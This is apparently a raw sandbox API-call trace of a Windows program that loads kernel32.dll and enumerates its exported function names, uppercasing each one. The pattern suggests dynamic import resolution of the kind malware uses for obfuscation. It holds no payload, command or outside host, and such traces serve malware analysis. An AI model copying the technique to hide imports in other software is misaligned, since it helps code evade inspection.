VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.912] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.912] GetTickCount () returned 0x114db04 [0084.912] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.912] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.912] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.912] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.913] lstrlenA (lpString="kernel32.dll") returned 12 [0084.913] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.913] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.913] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.913] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.913] lstrlenA (lpString="ADDATOMA") returned 8 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.913] lstrlenA (lpString="ADDATOMW") returned 8 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.913] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.913] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.913] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.913] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.913] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.913] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.913] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.914] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.914] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.914] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.914] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.914] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.914] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.914] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.914] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.914] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.914] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.914] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.914] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.914] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.914] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.914] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.914] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.914] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.914] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.914] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.914] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.915] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.915] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.915] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.915] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.915] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.915] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.915] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.915] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.915] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.915] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.915] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.915] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.915] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.915] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.915] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.915] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.915] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.915] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.915] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.915] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.916] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.916] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.916] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.916] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.916] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.916] lstrlenA (lpString="BEEP") returned 4 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.916] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.916] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.916] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.916] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.916] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.916] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.916] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.916] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.916] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.916] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.916] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.916] lstrlenA (lpString="CANCELIO") returned 8 [0084.916] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.917] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.917] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.917] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.917] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.917] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.917] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.917] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.917] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.917] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.917] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.917] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.917] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.917] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.917] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.917] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.917] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.917] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.917] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.917] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.917] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.918] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.918] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.918] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.918] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.918] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.918] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.918] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.918] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.918] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.918] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.918] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.918] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.918] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.918] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.918] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.919] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.919] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.919] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.919] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.919] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.919] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.919] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.919] lstrlenA (lpString="COPYFILEA") returned 9 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.919] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.919] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.919] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.919] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.919] lstrlenA (lpString="COPYFILEW") returned 9 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.919] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.919] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.919] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.919] 